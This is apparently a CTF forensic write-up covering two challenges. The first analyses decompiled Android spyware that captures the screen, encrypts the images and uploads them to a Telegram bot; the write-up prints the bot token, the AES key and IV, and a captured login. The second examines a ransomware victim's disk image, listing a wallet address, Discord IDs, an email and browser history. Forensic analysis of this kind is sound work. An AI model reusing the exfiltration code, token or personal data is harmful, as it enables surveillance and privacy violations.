Image.Plane[] planes = acquireLatestImage.getPlanes();
ByteBuffer buffer = planes[0].getBuffer();
int pixelStride = planes[0].getPixelStride();
Bitmap createBitmap = Bitmap.createBitmap(((planes[0].getRowStride() - (acquireLatestImage.getWidth() * pixelStride)) / pixelStride) + acquireLatestImage.getWidth(), acquireLatestImage.getHeight(), Bitmap.Config.ARGB_8888);
f.e(createBitmap, "createBitmap(...)");
createBitmap.copyPixelsFromBuffer(buffer);
acquireLatestImage.close();
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
createBitmap.compress(Bitmap.CompressFormat.PNG, 100, byteArrayOutputStream);
byte[] byteArray = byteArrayOutputStream.toByteArray();
try {
String str2 = a.f393a;
f.c(byteArray);
byte[] a2 = a.a(byteArray);
File file = new File(screenCaptureService.getExternalFilesDir((String) null), ".logs");
if (!file.exists()) {
file.mkdirs();
}
str = "log_" + System.currentTimeMillis() + ".enc";
FileOutputStream fileOutputStream = new FileOutputStream(new File(file, str));
try {
fileOutputStream.write(a2);
l.o(fileOutputStream, (Throwable) null);
File file2 = new File(screenCaptureService.getExternalFilesDir((String) null), ".logs/" + str);
r rVar = new r();
String uuid = UUID.randomUUID().toString();
f.e(uuid, "randomUUID().toString()");
j jVar2 = j.f3646d;
j b2 = i.b(uuid);
o oVar2 = q.f2353e;
ArrayList arrayList = new ArrayList();
o oVar3 = q.f2353e;
f.f(oVar3, "type");
if (f.a(oVar3.b, "multipart")) {
byte[] bytes = "-1002300479215".getBytes(c1.a.f1544a);
f.e(bytes, "this as java.lang.String).getBytes(charset)");
int length = bytes.length;
j jVar3 = b2;
b.b((long) bytes.length, (long) 0, (long) length);
arrayList.add(d.r("chat_id", (String) null, new v((o) null, length, bytes, 0)));
String name = file2.getName();
Pattern pattern = o.f2348d;
try {
oVar = d.w("application/octet-stream");
} catch (IllegalArgumentException unused) {
oVar = null;
}
arrayList.add(d.r("document", name, new u(oVar, file2)));
if (!arrayList.isEmpty()) {
q qVar = new q(jVar3, oVar3, b.w(arrayList));
F.f fVar = new F.f();
String str3 = "https://api.telegram.org/bot8369776437:AAFYoPjexy1-_wdpuCHAjIS4ZW9eJ6B-T0Q/sendDocument";
if (c1.l.y0(str3, "ws:", true)) {
str3 = "http:".concat("ps://api.telegram.org/bot8369776437:AAFYoPjexy1-_wdpuCHAjIS4ZW9eJ6B-T0Q/sendDocument");
} else if (c1.l.y0(str3, "wss:", true)) {
str3 = "https:".concat("s://api.telegram.org/bot8369776437:AAFYoPjexy1-_wdpuCHAjIS4ZW9eJ6B-T0Q/sendDocument");
} ≠≠––
f.f(str3, "<this>");
f1.l lVar = new f1.l();
lVar.d((m) null, str3);
fVar.f151c = lVar.a();
fVar.j("POST", qVar);
t a3 = fVar.a();
j1.j jVar4 = new j1.j(rVar, a3);
e eVar = new e(3);
if (jVar4.g.compareAndSet(false, true)) {
n nVar = n.f3271a;
jVar4.f2963h = n.f3271a.g();
jVar4.f2962e.getClass();
s sVar = rVar.f2360a;
g gVar3 = new g(jVar4, eVar);
sVar.getClass();
synchronized (sVar) {
((ArrayDeque) sVar.b).add(gVar3);
String str4 = ((m) a3.b).f2344d;
Iterator it = ((ArrayDeque) sVar.f1172c).iterator();
while (true) {
if (it.hasNext()) {
gVar = (g) it.next();
if (f.a(((m) gVar.f2956c.b.b).f2344d, str4)) {
}
} else {
Iterator it2 = ((ArrayDeque) sVar.b).iterator();
while (true) {
if (it2.hasNext()) {
gVar = (g) it2.next();
if (f.a(((m) gVar.f2956c.b.b).f2344d, str4)) {
}
}
}
}
}
gVar2 = gVar;
if (gVar2 != null) {
gVar3.b = gVar2.b;
}
}
sVar.h();
} else {
throw new IllegalStateException("Already Executed".toString());
}
} else {
throw new IllegalStateException("Multipart body must have at least one part.".toString());
}
} else {
throw new IllegalArgumentException(("multipart != " + oVar3).toString());
}
} catch (Throwable th2) {
Throwable th3 = th2;
l.o(fileOutputStream, th);
throw th3;
}
} catch (Exception e2) {
Log.i("ser0tonin", "error: " + e2.getMessage(), e2);
str = "a";
}
}
((ScreenCaptureService) this.b).f1882d.postDelayed(this, 30000);
return;
case 1:
O.g gVar4 = (O.g) this.b;
if (gVar4.f466o) {
boolean z3 = gVar4.f464m;
O.a aVar = gVar4.f455a;
if (z3) {
gVar4.f464m = false;
aVar.getClass();
long currentAnimationTimeMillis = AnimationUtils.currentAnimationTimeMillis();
aVar.f451e = currentAnimationTimeMillis;
aVar.g = -1;
aVar.f = currentAnimationTimeMillis;
aVar.f452h = 0.5f;
}
if ((aVar.g <= 0 || AnimationUtils.currentAnimationTimeMillis() <= aVar.g + ((long) aVar.f453i)) && gVar4.e()) {
boolean z4 = gVar4.f465n;
View view = gVar4.f456c;
if (z4) {
gVar4.f465n = false;
long uptimeMillis = SystemClock.uptimeMillis();
MotionEvent obtain = MotionEvent.obtain(uptimeMillis, uptimeMillis, 3, 0.0f, 0.0f, 0);
view.onTouchEvent(obtain);
obtain.recycle();
}
if (aVar.f != 0) {
long currentAnimationTimeMillis2 = AnimationUtils.currentAnimationTimeMillis();
float a4 = aVar.a(currentAnimationTimeMillis2);
aVar.f = currentAnimationTimeMillis2;
gVar4.f468q.scrollListBy((int) (((float) (currentAnimationTimeMillis2 - aVar.f)) * ((a4 * 4.0f) + (-4.0f * a4 * a4)) * aVar.f450d));
WeakHashMap weakHashMap = Q.f316a;
view.postOnAnimation(this);
return;
}
throw new RuntimeException("Cannot compute scroll delta before calling start()");
}
gVar4.f466o = false;
return;
}
return;
case 2:
((R.e) this.b).n(0);
return;
case 3:
C0049m mVar = (C0049m) this.b;
int i3 = mVar.f753A;
ValueAnimator valueAnimator = mVar.f777z;
if (i3 != 1) {
i2 = 2;
if (i3 != 2) {
return;
}
} else {
i2 = 2;
valueAnimator.cancel();
}
mVar.f753A = 3;
float[] fArr = new float[i2];
fArr[0] = ((Float) valueAnimator.getAnimatedValue()).floatValue();
fArr[1] = 0.0f;
valueAnimator.setFloatValues(fArr);
valueAnimator.setDuration((long) 500);
valueAnimator.start();
return;
case 4:
RecyclerView recyclerView = (RecyclerView) this.b;
H h2 = recyclerView.f1453H;
if (h2 != null) {
C0046j jVar5 = (C0046j) h2;
ArrayList arrayList2 = jVar5.f731h;
boolean z5 = !arrayList2.isEmpty();
ArrayList arrayList3 = jVar5.f733j;
boolean z6 = !arrayList3.isEmpty();
ArrayList arrayList4 = jVar5.f734k;
boolean z7 = !arrayList4.isEmpty();
ArrayList arrayList5 = jVar5.f732i;
boolean z8 = !arrayList5.isEmpty();
if (z5 || z6 || z8 || z7) {
Iterator it3 = arrayList2.iterator();
while (true) {
boolean hasNext = it3.hasNext();
long j3 = jVar5.f609d;
if (hasNext) {
a0 a0Var = (a0) it3.next();
View view2 = a0Var.f663a;
ViewPropertyAnimator animate = view2.animate();
jVar5.f740q.add(a0Var);
animate.setDuration(j3).alpha(0.0f).setListener(new C0041e(jVar5, a0Var, animate, view2)).start();
} else {
arrayList2.clear();
if (z6) {
ArrayList arrayList6 = new ArrayList();
arrayList6.addAll(arrayList3);
jVar5.f736m.add(arrayList6);
arrayList3.clear();
C0040d dVar = new C0040d(jVar5, arrayList6, 0);
if (z5) {
View view3 = ((C0045i) arrayList6.get(0)).f722a.f663a;
WeakHashMap weakHashMap2 = Q.f316a;
view3.postOnAnimationDelayed(dVar, j3);
} else {
dVar.run();
}
}
if (z7) {
ArrayList arrayList7 = new ArrayList();
arrayList7.addAll(arrayList4);
jVar5.f737n.add(arrayList7);
arrayList4.clear();
C0040d dVar2 = new C0040d(jVar5, arrayList7, 1);
if (z5) {
View view4 = ((C0044h) arrayList7.get(0)).f711a.f663a;
WeakHashMap weakHashMap3 = Q.f316a;
view4.postOnAnimationDelayed(dVar2, j3);
} else {
dVar2.run();
}
}
if (z8) {
ArrayList arrayList8 = new ArrayList();
arrayList8.addAll(arrayList5);
jVar5.f735l.add(arrayList8);
arrayList5.clear();
C0040d dVar3 = new C0040d(jVar5, arrayList8, 2);
if (z5 || z6 || z7) {
if (!z5) {
j3 = 0;
}
long max = Math.max(z6 ? jVar5.f610e : 0, z7 ? jVar5.f : 0) + j3;
View view5 = ((a0) arrayList8.get(0)).f663a;
WeakHashMap weakHashMap4 = Q.f316a;
view5.postOnAnimationDelayed(dVar3, max);
} else {
dVar3.run();
}
}
}
}
}
z2 = false;
} else {
z2 = false;
}
recyclerView.f1481i0 = z2;
return;
case 5:
((StaggeredGridLayoutManager) this.b).y0();
return;
case 6:
try {
c.super.onBackPressed();
return;
} catch (IllegalStateException e3) {
if (!TextUtils.equals(e3.getMessage(), "Can not perform this action after onSaveInstanceState")) {
throw e3;
}
return;
} catch (NullPointerException e4) {
if (!TextUtils.equals(e4.getMessage(), "Attempt to invoke virtual method 'android.os.Handler android.app.FragmentHostCallback.getHandler()' on a null object reference")) {
throw e4;
}
return;
}
case 7:
C0065d dVar4 = (C0065d) this.b;
dVar4.f1284a.endViewTransition(dVar4.b);
dVar4.f1285c.d();
return;
case 8:
C0073l lVar2 = (C0073l) this.b;
lVar2.f1299U.onDismiss(lVar2.f1307c0);
return;
case 9:
((D) this.b).w(true);
return;
case 10:
break;
case 11:
C0261v0 v0Var = (C0261v0) this.b;
v0Var.f2906l = null;
v0Var.drawableStateChanged();
return;
case 12:
ActionMenuView actionMenuView = ((Toolbar) this.b).f1036a;
if (actionMenuView != null && (jVar = actionMenuView.f965t) != null) {
jVar.l();
return;
}
return;
default:
h hVar = (h) this.b;
hVar.f124c = false;
BottomSheetBehavior bottomSheetBehavior = (BottomSheetBehavior) hVar.f126e;
R.e eVar2 = bottomSheetBehavior.f1586M;
if (eVar2 != null && eVar2.f()) {
hVar.a(hVar.b);
return;
} else if (bottomSheetBehavior.f1585L == 2) {
bottomSheetBehavior.C(hVar.b);
return;
} else {
return;
}
}
while (true) {
i1.d dVar5 = (i1.d) this.b;
synchronized (dVar5) {
try {
c2 = dVar5.c();
} catch (Throwable th4) {
throw th4;
}
}
if (c2 != null) {
i1.c cVar = c2.f2646c;
f.c(cVar);
i1.d dVar6 = (i1.d) this.b;
boolean isLoggable = i1.d.f2655j.isLoggable(Level.FINE);
if (isLoggable) {
cVar.f2649a.f2656a.getClass();
j2 = System.nanoTime();
w.a(c2, cVar, "starting");
} else {
j2 = -1;
}
try {
i1.d.a(dVar6, c2);
if (isLoggable) {
cVar.f2649a.f2656a.getClass();
w.a(c2, cVar, "finished run in ".concat(w.k(System.nanoTime() - j2)));
}
} catch (Throwable th5) {
if (isLoggable) {
cVar.f2649a.f2656a.getClass();
w.a(c2, cVar, "failed a run in ".concat(w.k(System.nanoTime() - j2)));
}
throw th5;
}
} else {
return;
}
}
}
}So we know that the encryption image send to telegram.
7. What is the bot API token?
Based on the c.java we know the encryption image send to https://api.telegram.org/bot8369776437:AAFYoPjexy1-_wdpuCHAjIS4ZW9eJ6B-T0Q/sendDocument . Based on the documentation of the Telegram official website, https://core.telegram.org/bots/api, we know that the bot API token is 8369776437:AAFYoPjexy1-_wdpuCHAjIS4ZW9eJ6B-T0Q.
8. What is the bot username?
From the bot and the documentations, we can use /getMe endpoint to know the bot details.
So the username of the bot is gunterhelpsBot.
9. What is the group name and invite link?
After we know the bot username, we can visit the bot and get the invite link.
Then when we click the group link it show the group name
mycrib, https://t.me/+zRtqX7HghAs4ZTE1
10. What is the login credential that was captured and sent at this window of time [Tuesday, July 29, 2025 5:26 AM — Tuesday, July 29, 2025 5:30 AM]?
Scroll up to the group in the given timeline, I download it all and decrypt that.
import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
ENCS_FOLDER = "encs"
OUT_FOLDER = "decrypted"
AES_KEY = b"dPGgF7tQlBaGqqmj"
IV = b"Cj7pYMR6FqYFKRYi"
MAGIC_EXT = {
b"\x89PNG\r\n\x1a\n": ".png",
b"\xff\xd8\xff": ".jpg",
b"%PDF": ".pdf",
b"PK\x03\x04": ".zip",
}
def detect_extension(data: bytes) -> str:
for magic, ext in MAGIC_EXT.items():
if data.startswith(magic):
return ext
return ".bin"
os.makedirs(OUT_FOLDER, exist_ok=True)
for fname in os.listdir(ENCS_FOLDER):
if fname.lower().endswith(".enc"):
enc_path = os.path.join(ENCS_FOLDER, fname)
with open(enc_path, "rb") as f:
ciphertext = f.read()
cipher = AES.new(AES_KEY, AES.MODE_CBC, IV)
plaintext_padded = cipher.decrypt(ciphertext)
plaintext = unpad(plaintext_padded, AES.block_size)
ext = detect_extension(plaintext)
out_path = os.path.join(OUT_FOLDER, os.path.splitext(fname)[0] + ext)
with open(out_path, "wb") as f:
f.write(plaintext)
print(f"[+] {fname} → {out_path} ({ext})")
So we know the credentials is operator1337:HM1_standin9_Str0nk.
P.S. If you notice that the bot token is different from the source code, I’m writing this write-up a week after the CTF ends, so the bot used in the D-Day CTF has already been shut down. I’m opening a ticket and would like to thank the problem setter for giving me a new bot with the same behavior as before.
Hacked
Difficulty: Medium
Bruh, I just got hacked. Please help me analyze this artifact and answer all the questions given
Always perform analysis of forensic artifacts in a sandboxed environment
Author: daffainfo
In this challenge, we’re given Windows Virtual Disk Machine (vmdk), a file format that describes containers for virtual hard disk drives to be used in virtual machines like VMware Workstation or VirtualBox. There is several ways to do for analyze that, in this case, I extract it and it will be some partitions inside it.
So there is 3 ntfs and 1 fat. New Technology File System (NTFS) is the default file system for modern Windows-based operating system (OS). And there is also FAT, or File Allocation Table, is a file system that was developed by Microsoft to support small disks and simple folder structures.
To continue the analysis, we can use NTFS. Because the NTFS is the main filesystem for Windows Installations. In this case, the main Windows partition is 1.ntfs. After knowing which file we can use to continue the analysis, we can extract them use 7zip. To help the analysis process, Im use regrippy, a framework for reading and extracting useful forensics data from Windows registry hives.
1. Username on the device infected with malware?
We can use regrippy to get the user registered in the computer. First we can get the SOFTWARE in the Windows/System32/config/SOFTWARE and got the user list.
There is only one user registered, so the answer is Peacock.
2. Which folder is encrypted by the malware?
Now that we know the infected user is Peacock, we can go through the Peacock directory and try to open all of their folders. We found a Downloads folder with some .enc extensions.
Therefore, we can conclude that the folder encrypted by the malware is Downloads. Therefore, the path is C:\Users\Peacock\Downloads.
3. The threat actor’s crypto wallet?
Based on the picture above, we notice there is one file that’s not encrypted called README.md, we can open it and got the answer for this question.
Send me 10000 USDT to unlock your PC (0xe28789577b1F8cfD964b2fD860807758216CeAE1)So we know the threat actor’s crypto wallet is 0xe28789577b1F8cfD964b2fD860807758216CeAE1.
4. What applications do threat actors use to interact with victims?
To identify the applications with which the victim interacts, the threat actor can first read the startup programs that open whenever the user powers on their computer.
After identifying the apps that open on startup, we can see that the app commonly used for communication is Discord, which is installed on the computer. Therefore, we know that the victim communicates with threat actors through Discord.
5. Victim’s Discord ID?
For the victim discord id, we can visit the discord app path Users/Peacock/AppData/Roaming/discord/sentry/scope_v3.json , that is Sentry crash-report context file used by Discord to store info like session data, OS/app version, and recent actions before an error. From that, we can know the victim username, user id and their email.
"user":{"id":"1391969554309058590","username":"peacock1337","email":"ptsukadudukhr@gmail.com"}So the Victim’s Discord ID is 1391969554309058590.
6. Threat actor’s Discord ID?
To search the actor’s Discord ID, we can see in the Local Storage, Users/Peacock/AppData/Roaming/discord/Local Storage/leveldb/000007.log and we can see the incoming request friend sent to the victim.
[{"acked":true,"forceUnacked":false,"other_user":{"id":"1391972617149481050","username":"f16yum","discriminator":"0","avatar":"9614bb4b6e68e613804937c4567074b4","avatarDecorationData":null,"banner":null,"email":null,"verified":false,"bot":false,"system":false,"mfaEnabled":false,"mobile":false,"desktop":false,"flags":0,"publicFlags":0,"purchasedFlags":0,"premiumUsageFlags":0,"phone":null,"guildMemberAvatars":{},"hasBouncedEmail":false,"personalConnectionId":null,"globalName":"Coolllllll","primaryGuild":null,"collectibles":null},"kind":"notification-center-item","local_id":"incoming_friend_requests_accepted_1391972617149481050_1392321463322673152","deeplink":"https://discord.com/users/1391972617149481050","type":"INCOMING_FRIEND_REQUESTS_ACCEPTED","id":"1392321463322673152"}]So, from there, we know that the suspected threat actor’s Discord ID is 1391972617149481050.
7. When did the threat actor join the same group as the victim?
From the sentry, we know the victim is joining Risk on Rain server.
{"scope":{"breadcrumbs":[{"timestamp":1752025501.733,"category":"electron","message":"window.blur","type":"ui","data":{"id":2,"url":"https://discordapp.com/channels/417739215355510784/559905030304694273"}}And we know the victim discord global name, so we can go to Risk on Rain server and in the welcome channel, we can search @Coolllllll and get the time when threat actor join the same group as the victim.
So the answer is 08/07/2025.
8. The link containing initial loader that was sent by the threat actor to the victim?
In this question, Im stuck for an hours. And I just realize that althought the link was send in the discord, it will be captured or recorded in the victim’s browser. So we can go to Users/Peacock/AppData/Local/Microsoft/Edge/User Data/Default/History the default browser victim used. We can open the sqlite3 file and get the list of the tables.
And we can see the visited_links table to see the link send by threat actors.
sqlite> SELECT * FROM visited_links;
1|5|https://www.bing.com/search?q=download+discord&cvid=421d51c7c3044f8fbc72251461e7d39e&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOTIGCAEQABhAMgYIAhAuGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQLhhAMgYICBAuGEDSAQgyMTExajBqNKgCALACAQ&FORM=ANAB01&PC=U531|https://www.bing.com/|1
2|4|https://www.bing.com/ck/a?!&&p=19031704352c80dfad02a283cd0a4aa83f43e5034ff1d15eec856a05f191f825JmltdHM9MTc1MTkzMjgwMA&ptn=3&ver=2&hsh=4&fclid=10fb4f82-e80e-6c96-23ea-59a1e94b6d0e&psq=download+discord&u=a1aHR0cHM6Ly9kaXNjb3JkLmNvbS9kb3dubG9hZA&ntb=1|https://www.bing.com/|1
3|6|https://www.bing.com/search?q=download+discord&cvid=421d51c7c3044f8fbc72251461e7d39e&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOTIGCAEQABhAMgYIAhAuGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQLhhAMgYICBAuGEDSAQgyMTExajBqNKgCALACAQ&FORM=ANAB01&PC=U531|https://www.bing.com/|1
4|10|https://www.bing.com/search?q=download+stema&cvid=1188bc092a854e709f39bdbb8f9d5312&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOdIBCDE1NzBqMGo0qAIBsAIB&FORM=ANAB01&PC=U531|https://www.bing.com/|1
5|11|https://www.bing.com/search?q=download+steam&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=download+stea&sc=12-13&sk=&cvid=CEDD194FA6564FE1A1006D2BF20B1F97|https://www.bing.com/|1
6|10|https://www.bing.com/ck/a?!&&p=8e818a590ecfb9c7e6377b233e3e4e984476cf581caadf607c935f808e64c7a7JmltdHM9MTc1MTkzMjgwMA&ptn=3&ver=2&hsh=4&fclid=10fb4f82-e80e-6c96-23ea-59a1e94b6d0e&psq=download+steam&u=a1aHR0cHM6Ly9zdG9yZS5zdGVhbXBvd2VyZWQuY29tL2Fib3V0L2Rvd25sb2Fk&ntb=1|https://www.bing.com/|1
7|12|https://www.bing.com/search?q=download+steam&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=download+stea&sc=12-13&sk=&cvid=CEDD194FA6564FE1A1006D2BF20B1F97|https://www.bing.com/|1
8|13|https://www.bing.com/search?q=download+steam&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=download+stea&sc=12-13&sk=&cvid=CEDD194FA6564FE1A1006D2BF20B1F97|https://www.bing.com/|1
9|15|https://www.bing.com/search?q=yuru%20camp%20wallpaper&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=yuru%20camp%20wallpap&sc=10-17&sk=&cvid=EE6207E55233450497E19D2295886F08|https://www.bing.com/|1
10|16|https://www.bing.com/search?q=yuru%20camp%20wallpaper%20hd&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=yuru%20camp%20wallpaper%20hd&sc=12-22&sk=&cvid=1E81B5E4CDE04F318D166BFB8652A4DE|https://www.bing.com/|1
11|17|https://www.bing.com/search?q=yuru%20camp%20wallpaper%20hd%20windows&qs=n&form=QBRE&sp=-1&lq=0&pq=yuru%20camp%20wallpaper%20hd%20window&sc=12-29&sk=&cvid=9689F2A9A4C34985A1C5C34141FAAA35|https://www.bing.com/|1
12|16|https://www.bing.com/ck/a?!&&p=72bc0fa901c98439f499e9d3b0e164b3dddac45f83c511867ae89f834b115277JmltdHM9MTc1MTkzMjgwMA&ptn=3&ver=2&hsh=4&fclid=10fb4f82-e80e-6c96-23ea-59a1e94b6d0e&u=a1L2ltYWdlcy9zZWFyY2g_cT15dXJ1K2NhbXArd2FsbHBhcGVyK2hkK3dpbmRvd3MmRk9STT1IRFJTQzM&ntb=1|https://www.bing.com/|1
13|18|https://www.bing.com/search?q=yuru%20camp%20wallpaper%20hd%20windows&qs=n&form=QBRE&sp=-1&lq=0&pq=yuru%20camp%20wallpaper%20hd%20window&sc=12-29&sk=&cvid=9689F2A9A4C34985A1C5C34141FAAA35|https://www.bing.com/|1
14|19|https://www.bing.com/images/search?q=yuru+camp+wallpaper+hd+windows&FORM=HDRSC3|https://www.bing.com/|1
15|20|https://www.bing.com/images/search?q=yuru+camp+wallpaper+hd+windows&form=HDRSC3&first=1|https://www.bing.com/|1
16|21|https://www.bing.com/images/search?view=detailV2&ccid=9o%2bDxENr&id=374E9DCFB6E9B4D5F41F52E093B6E30043C33E24&thid=OIP.9o-DxENrsG_woz0cmMbNiAHaEo&mediaurl=https%3a%2f%2fc4.wallpaperflare.com%2fwallpaper%2f95%2f767%2f593%2fanime-yuru-camp-aoi-inuyama-chiaki-oogaki-ena-saitou-hd-wallpaper-preview.jpg&exph=455&expw=728&q=yuru+camp+wallpaper+hd+windows&simid=607992689660419437&FORM=IRPRST&ck=1C6244D75BE35010DC1AE6D4F073AA7A&selectedIndex=0&itb=0&ajaxhist=0&ajaxserp=0|https://www.bing.com/|1
17|19|https://www.bing.com/images/search?view=detailV2&ccid=C1nJTs%2F9&id=D0384003DCAB642922E82BB56083A2697FD8AD66&thid=OIP.C1nJTs_9MovVSWHlxeXcMgHaEc&mediaurl=https%3A%2F%2Fw.forfun.com%2Ffetch%2F4f%2F4fea8952fdb580efb24a0b1b69966a32.jpeg&exph=2400&expw=4000&q=yuru+camp+wallpaper+hd+windows&simid=608002331857134002&form=IRPRST&ck=6AEEE84C4A93F9187AA1B6B292ED4DC1&selectedindex=1&itb=0&ajaxhist=0&ajaxserp=0&vt=0&sim=11|https://www.bing.com/|1
18|22|https://www.bing.com/images/search?q=yuru+camp+wallpaper+hd+windows&form=HDRSC3&first=1|https://www.bing.com/|1
19|23|https://www.bing.com/images/search?view=detailV2&ccid=X3I1pIP8&id=DA648919980214D4932933BFE86387BFCB24E345&thid=OIP.X3I1pIP8dksSxuCLhdlE2QHaED&mediaurl=https%3a%2f%2fget.wallhere.com%2fphoto%2fYuru-Camp-Rin-Shima-Nadeshiko-Kagamihara-2092455.jpg&exph=1094&expw=2000&q=yuru+camp+wallpaper+hd+windows&simid=608003117866424549&FORM=IRPRST&ck=DEF93472B4C0AB67AB6D5AC3456070CB&selectedIndex=10&itb=0&ajaxhist=0&ajaxserp=0|https://www.bing.com/|1
20|24|https://www.bing.com/images/search?view=detailV2&ccid=X3I1pIP8&id=DA648919980214D4932933BFE86387BFCB24E345&thid=OIP.X3I1pIP8dksSxuCLhdlE2QHaED&mediaurl=https%3a%2f%2fget.wallhere.com%2fphoto%2fYuru-Camp-Rin-Shima-Nadeshiko-Kagamihara-2092455.jpg&exph=1094&expw=2000&q=yuru+camp+wallpaper+hd+windows&simid=608003117866424549&FORM=IRPRST&ck=DEF93472B4C0AB67AB6D5AC3456070CB&selectedIndex=10&itb=0&ajaxhist=0&ajaxserp=0|https://www.bing.com/|1
21|25|https://www.bing.com/images/search?view=detailV2&ccid=X3I1pIP8&id=DA648919980214D4932933BFE86387BFCB24E345&thid=OIP.X3I1pIP8dksSxuCLhdlE2QHaED&mediaurl=https%3A%2F%2Fget.wallhere.com%2Fphoto%2FYuru-Camp-Rin-Shima-Nadeshiko-Kagamihara-2092455.jpg&exph=1094&expw=2000&q=yuru+camp+wallpaper+hd+windows&simid=608003117866424549&form=IRPRST&ck=DEF93472B4C0AB67AB6D5AC3456070CB&selectedindex=8&itb=0&ajaxhist=0&ajaxserp=0&vt=2&sim=15,16&ajaxhist=0&ajaxserp=0|https://www.bing.com/|1
22|26|https://www.bing.com/newtabredir?url=https%3A%2F%2Fwww.reddit.com%2Fr%2FChainsawMan%2Fcomments%2Fl9e1v4%2Fdenji_beam%2F|https://www.bing.com/|1
23|27|https://www.bing.com/images/search?view=detailV2&ccid=X3I1pIP8&id=DA648919980214D4932933BFE86387BFCB24E345&thid=OIP.X3I1pIP8dksSxuCLhdlE2QHaED&mediaurl=https%3A%2F%2Fget.wallhere.com%2Fphoto%2FYuru-Camp-Rin-Shima-Nadeshiko-Kagamihara-2092455.jpg&exph=1094&expw=2000&q=yuru+camp+wallpaper+hd+windows&simid=608003117866424549&form=IRPRST&ck=DEF93472B4C0AB67AB6D5AC3456070CB&selectedindex=8&itb=0&ajaxhist=0&ajaxserp=0&vt=2&sim=15,16&ajaxhist=0&ajaxserp=0|https://www.bing.com/|1
24|26|https://www.bing.com/newtabredir?url=https%3A%2F%2Frare-gallery.com%2F5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.html|https://www.bing.com/|1
25|28|https://www.bing.com/images/search?view=detailV2&ccid=X3I1pIP8&id=DA648919980214D4932933BFE86387BFCB24E345&thid=OIP.X3I1pIP8dksSxuCLhdlE2QHaED&mediaurl=https%3a%2f%2fget.wallhere.com%2fphoto%2fYuru-Camp-Rin-Shima-Nadeshiko-Kagamihara-2092455.jpg&exph=1094&expw=2000&q=yuru+camp+wallpaper+hd+windows&simid=608003117866424549&FORM=IRPRST&ck=DEF93472B4C0AB67AB6D5AC3456070CB&selectedIndex=10&itb=0&mode=overlay|https://www.bing.com/|1
26|29|https://rare-gallery.com/5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.html|https://rare-gallery.com/|1
27|30|https://rare-gallery.com/5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.html|https://rare-gallery.com/|1
28|28|https://rare-gallery.com/5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.html
29|32|https://www.bing.com/search?pglt=547&q=free+ror2+crack&cvid=14d692b0591e4b0f9dace57b1cfb0e40&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOTIGCAEQABhAMgYIAhAAGEDSAQg0NjMwajBqMagCALACAA&FORM=ANSPA1&PC=U531|https://www.bing.com/|1
30|33|https://www.bing.com/search?q=risk%20of%20rain%202%20crack&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=risk%20of%20rain%202%20cra&sc=12-18&sk=&cvid=A53C0A0DB73F4A1585E81A198D823FD8&ajf=10|https://www.bing.com/|1
31|32|https://www.bing.com/ck/a?!&&p=fdc798f498bd2198b5fefc8312f29794a88f10a0e2f854e97fd318a097a4821cJmltdHM9MTc1MTkzMjgwMA&ptn=3&ver=2&hsh=4&fclid=10fb4f82-e80e-6c96-23ea-59a1e94b6d0e&psq=risk+of+rain+2+crack&u=a1aHR0cHM6Ly93d3cuZ2FtZXNsZWFybmluZ3NvY2lldHkub3JnL2hvdy10by1tb2QtY3JhY2tlZC1yaXNrLW9mLXJhaW4tMi8&ntb=1|https://www.bing.com/|1
32|34|https://www.bing.com/search?q=risk%20of%20rain%202%20crack&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=risk%20of%20rain%202%20cra&sc=12-18&sk=&cvid=A53C0A0DB73F4A1585E81A198D823FD8&ajf=10|https://www.bing.com/|2
33|35|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/|https://www.gameslearningsociety.org/|1
34|34|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/?__cf_chl_rt_tk=EAsZNkfmjpBOguH.gpKRXiLtH9S2YglrRzqGJ_ddEGg-1752025521-1.0.1.1-DhW2Iue7YwDe8S_711FoGUJg.n9w1lsFW6T4F6P4d34|https://www.gameslearningsociety.org/|1
35|39|https://www.youtube.com/|https://www.youtube.com/|1
36|40|https://www.youtube.com/|https://www.youtube.com/|1
37|41|https://www.youtube.com/results?search_query=ror2+gameplay+longest|https://www.youtube.com/|1
38|34|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/|https://www.gameslearningsociety.org/|2
39|42|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/|https://www.gameslearningsociety.org/|1
40|34|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/?__cf_chl_rt_tk=w76WbzPR.wuha33gHsnDsmTvJUgpd2uFl12C6_QGy.0-1752025683-1.0.1.1-rADxNNnB8WStfNQVlBrgpqpNzz5GZI2yTjwxVYW3BHE|https://www.gameslearningsociety.org/|1
41|43|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/|https://www.gameslearningsociety.org/|1
42|34|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/?__cf_chl_rt_tk=kFUTFNnUd6sRNgb.wvf1dtAm7YE5PhiSQdlhkFIE46w-1752025823-1.0.1.1-qrezcqD3Mfk9iWhw2ZgcZQr3rGKbUlpT8FDri7pWs0M|https://www.gameslearningsociety.org/|1
43|44|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/|https://www.gameslearningsociety.org/|1
